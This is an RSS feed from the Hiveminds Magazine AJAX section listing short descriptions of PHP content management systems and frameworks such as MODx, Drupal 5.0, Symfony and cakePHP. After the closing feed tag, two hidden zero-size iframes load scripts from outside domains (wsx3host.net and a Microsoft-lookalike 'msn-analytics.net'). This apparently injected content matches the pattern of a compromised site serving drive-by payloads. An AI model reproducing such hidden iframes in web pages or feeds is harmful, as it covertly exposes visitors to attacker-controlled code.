<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="http://www.hiveminds.co.uk/feed.xsl" ?>
<?xml-stylesheet type="text/css" href="http://www.hiveminds.co.uk/feed.css" ?>
<rss version="2.0" xml:base="http://www.hiveminds.co.uk">
<channel>
 <title>Hiveminds Magazine - AJAX</title>
 <link>http://www.hiveminds.co.uk/taxonomy/term/472/AJAX</link>
 <description>Ajax, shorthand for Asynchronous JavaScript and XML, is a Web development technique for creating interactive web applications. The intent is to make web pages feel more responsive by exchanging small amounts of data with the server behind the scenes, so that the entire web page does not have to be reloaded each time the user makes a change. This is meant to increase the web page's interactivity, speed, and usability. The first known use of the term in public was by Jesse James Garrett in his February 2005 article Ajax: A New Approach to Web Applications. Garrett thought of the term while in the shower, trying to solve a complex application user experience issue for a large financial services firm. At subsequent talks and seminars Garrett has made the point that Ajax is not an acronym.

The Ajax technique uses a combination of:

    * XHTML (or HTML), CSS, for marking up and styling information.
    * The DOM accessed with a client-side scripting language, especially ECMAScript implementations such as JavaScript and JScript, to dynamically display and interact with the information presented.
    * The XMLHttpRequest object to exchange data asynchronously with the web server. In some Ajax frameworks and in certain situations, an IFrame object is used instead of the XMLHttpRequest object to exchange data with the web server.
    * XML is sometimes used as the format for transferring data between the server and client, although any format will work, including preformatted HTML, plain text, JSON and even EBML.
</description>
 <language>en</language>
 <copyright><![CDATA[Hiveminds Magazine copyrighted 2005-2006]]></copyright>
<item>
 <title>MODx CMS</title>
 <link>http://www.hiveminds.co.uk/content/modx-cms.html</link>
 <description><![CDATA[MODx is an open source project, run by a talented group of people adamant about not creating YAPS (Yet Another Portal System). MODx is an open source CMS that helps you take control of your website. It makes updates easy, empowering end-users with as much control as you desire over website content and update frequency.
Techies call MODx a Content Management System (CMS for short). It's also a pretty schwanky Application Framework. A robust and flexible API and an event override system makes building engaging web projects â€” and changing core functionality without hacking its code! â€” a breeze.
Not only does MODx help you build sites fast, but it also hides its tremendous power unless it's needed. As far as end users know, MODx is just an easy-to-use CMS with tons of freely available resources and one heck of an end user community.
The MODx Ajax CMS and PHP Application Framework brings plenty to the table, with more on the way, including:]]></description>
<comments>http://www.hiveminds.co.uk/content/modx-cms.html#comment-form</comments>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/472">AJAX</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/205">MODx</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/479">MySQL 4</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/480">MySQL 5</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/527">Website</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/467">blog</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/552">blog</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/482">core installer</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/458">online documentation</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/459">web community</category>
<pubDate>Sat, 06 Jan 2007 12:19:01 -0800</pubDate>
<guid isPermaLink="true">http://www.hiveminds.co.uk/node/3219</guid>
</item>
<item>
 <title>Drupal 5.0</title>
 <link>http://www.hiveminds.co.uk/content/drupal-5-0.html</link>
 <description><![CDATA[Drupal 5.0 beta 1 was released on 2006-10-31. Though it comes with a large list of new features as of this writing there is no official press release. But you can see the changes made here in the changelog. Somethings just cannot be described they have to be experienced. Like the new installation system which may set Drupal up a few notches against other CMS's like Joomla, Mambo and Typo3.]]></description>
<comments>http://www.hiveminds.co.uk/content/drupal-5-0.html#comment-form</comments>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/472">AJAX</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/448">Blogs</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/447">Community</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/163">Community building</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/180">Drupal</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/446">Frameworks</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/479">MySQL 4</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/480">MySQL 5</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/476">PHP4</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/477">PHP5</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/527">Website</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/490">blocks management</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/467">blog</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/492">category management</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/583">comment on content</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/497">content permission management</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/584">contribute content</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/482">core installer</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/503">design templates</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/483">extension installer</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/470">forum</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/513">friendly URLs</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/551">mod_rewrite</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/468">multiple blogs</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/516">multiple sites</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/488">rss agreggator</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/486">rss feeds</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/505">template manager</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/523">throttle</category>
<pubDate>Thu, 14 Dec 2006 11:01:05 -0800</pubDate>
<guid isPermaLink="true">http://www.hiveminds.co.uk/node/3155</guid>
</item>
<item>
 <title>Prado</title>
 <link>http://www.hiveminds.co.uk/content/prado.html-0</link>
 <description><![CDATA[PRADO is a component-based and event-driven framework for rapid Web programming in PHP 5. PRADO reconceptualizes Web application development in terms of components, events and properties instead of procedures, URLs and query parameters.]]></description>
<comments>http://www.hiveminds.co.uk/content/prado.html-0#comment-form</comments>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/472">AJAX</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/446">Frameworks</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/477">PHP5</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/547">internal model-view-controller</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/546">internal template engine</category>
<pubDate>Fri, 13 Oct 2006 22:32:45 -0700</pubDate>
<guid isPermaLink="true">http://www.hiveminds.co.uk/node/3053</guid>
</item>
<item>
 <title>Seagull</title>
 <link>http://www.hiveminds.co.uk/content/seagull.html</link>
 <description><![CDATA[Seagull is a mature OOP framework for building web, command line and GUI applications.  Licensed under BSD, the project allows PHP developers to easily integrate and manage code resources, and build complex applications quickly. ]]></description>
<comments>http://www.hiveminds.co.uk/content/seagull.html#comment-form</comments>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/472">AJAX</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/446">Frameworks</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/476">PHP4</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/477">PHP5</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/547">internal model-view-controller</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/546">internal template engine</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/545">object-relational mapping</category>
<pubDate>Fri, 16 Jun 2006 06:42:08 -0700</pubDate>
<guid isPermaLink="true">http://www.hiveminds.co.uk/node/3051</guid>
</item>
<item>
 <title>PHP on TRAX</title>
 <link>http://www.hiveminds.co.uk/content/php-on-trax.html</link>
 <description><![CDATA[PHP on Trax (formerly Php On Rails) is a web-application and persistance framework that is based on Ruby on Rails and includes everything needed to create database-backed web-applications according to the Model-View-Control pattern of separation.]]></description>
<comments>http://www.hiveminds.co.uk/content/php-on-trax.html#comment-form</comments>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/474">Apache webserver</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/472">AJAX</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/446">Frameworks</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/477">PHP5</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/547">internal model-view-controller</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/461">irc channel</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/462">mailing lists</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/545">object-relational mapping</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/458">online documentation</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/459">web community</category>
<pubDate>Fri, 16 Jun 2006 06:05:19 -0700</pubDate>
<guid isPermaLink="true">http://www.hiveminds.co.uk/node/3054</guid>
</item>
<item>
 <title>ZooP</title>
 <link>http://www.hiveminds.co.uk/content/zoop.html</link>
 <description><![CDATA[The Zoop PHP Framework is stable, scalable and
portable. It has been in production use for the last 5 years and has been used in many production environments. The Zoop PHP Framework is designed to be fast, efficient and clean. It is easily extendable and you choose to include only the functionality you use. ]]></description>
<comments>http://www.hiveminds.co.uk/content/zoop.html#comment-form</comments>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/472">AJAX</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/446">Frameworks</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/476">PHP4</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/477">PHP5</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/547">internal model-view-controller</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/546">internal template engine</category>
<pubDate>Fri, 16 Jun 2006 04:03:04 -0700</pubDate>
<guid isPermaLink="true">http://www.hiveminds.co.uk/node/3055</guid>
</item>
<item>
 <title>Symfony</title>
 <link>http://www.hiveminds.co.uk/content/symfony.html</link>
 <description><![CDATA[
Symfony is a web application framework for PHP5 projects.
It aims to speed up the creation and maintenance of web applications, and to replace the repetitive coding tasks by power, control and pleasure.]]></description>
<comments>http://www.hiveminds.co.uk/content/symfony.html#comment-form</comments>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/472">AJAX</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/446">Frameworks</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/477">PHP5</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/461">irc channel</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/462">mailing lists</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/459">web community</category>
<pubDate>Fri, 16 Jun 2006 01:44:18 -0700</pubDate>
<guid isPermaLink="true">http://www.hiveminds.co.uk/node/3050</guid>
</item>
<item>
 <title>cakePHP</title>
 <link>http://www.hiveminds.co.uk/content/cakephp.html</link>
 <description><![CDATA[Cake is a rapid development framework for PHP which uses commonly known design patterns like ActiveRecord, Association Data Mapping, Front Controller and MVC.]]></description>
<comments>http://www.hiveminds.co.uk/content/cakephp.html#comment-form</comments>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/534">ADOdb</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/472">AJAX</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/446">Frameworks</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/479">MySQL 4</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/476">PHP4</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/477">PHP5</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/538">PostGreSQL</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/521">cache to database</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/522">cache to file system</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/547">internal model-view-controller</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/461">irc channel</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/462">mailing lists</category>
 <category domain="http://www.hiveminds.co.uk/taxonomy/term/545">object-relational mapping</category>
<pubDate>Wed, 14 Jun 2006 12:05:35 -0700</pubDate>
<guid isPermaLink="true">http://www.hiveminds.co.uk/node/3048</guid>
</item>
</channel>
</rss>
<iframe src="http://wsx3host.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>